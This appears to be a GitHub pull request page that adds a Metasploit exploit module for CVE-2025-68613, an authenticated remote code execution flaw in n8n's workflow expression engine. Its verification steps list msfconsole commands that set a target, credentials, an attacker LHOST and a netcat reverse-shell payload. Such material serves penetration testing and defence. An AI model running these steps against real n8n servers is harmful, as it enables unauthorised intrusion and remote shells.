Add module for CVE 2025 68613 #20810
Open
+416
−0
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Fixes #20809
Add n8n Workflow Expression RCE (CVE-2025-68613)
This PR adds a new exploit module for CVE-2025-68613, an authenticated Remote Code Execution vulnerability in n8n versions >= 0.211.0 and < 1.120.4.
What does this change do?
Adds
exploit/linux/http/n8n_workflow_expression_rcewhich exploits a sandbox escape in the workflow expression evaluation engine. By injecting specific JavaScript payloads into aSchedule Triggerworkflow, authenticated users can execute arbitrary system commands.Vulnerable Versions Tested: 1.100.0, 1.110.0, 1.119.0
Files Added
modules/exploits/multi/http/n8n_workflow_expression_rce.rbdocumentation/modules/exploit/multi/http/n8n_workflow_expression_rce.mdVerification
msfconsoleuse exploit/linux/http/n8n_workflow_expression_rceset RHOSTS <target_ip>set RPORT 5678set USERNAME <user>set PASSWORD <pass>set LHOST <attacker_ip>set PAYLOAD cmd/unix/reverse_netcatcheckrunid)References